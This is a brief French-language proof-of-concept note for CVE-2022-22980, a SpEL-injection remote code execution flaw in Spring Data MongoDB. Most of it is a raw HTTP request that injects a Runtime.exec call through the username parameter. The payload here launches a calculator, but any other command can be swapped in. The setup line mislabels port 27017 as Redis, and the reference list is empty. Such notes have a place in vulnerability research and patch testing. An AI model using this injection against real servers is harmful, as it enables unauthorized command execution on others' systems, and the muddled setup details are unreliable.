
Exploit de preuve de concept pour CVE-2022-22980, une vulnérabilité d'exécution de code à distance dans Spring Data MongoDB via une injection SpEL dans le paramètre username.
Vulnérabilité de peu d'intérêt, simple note.
Démarrer Redis, port 27017
Démarrer le projet, Spring Boot démarre sur le port 6666


GET /v1/user/get?username=T(java.lang.Runtime).getRuntime().exec('open+-a+calculator.app') HTTP/1.1
Host: localhost:6666
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 2
Références :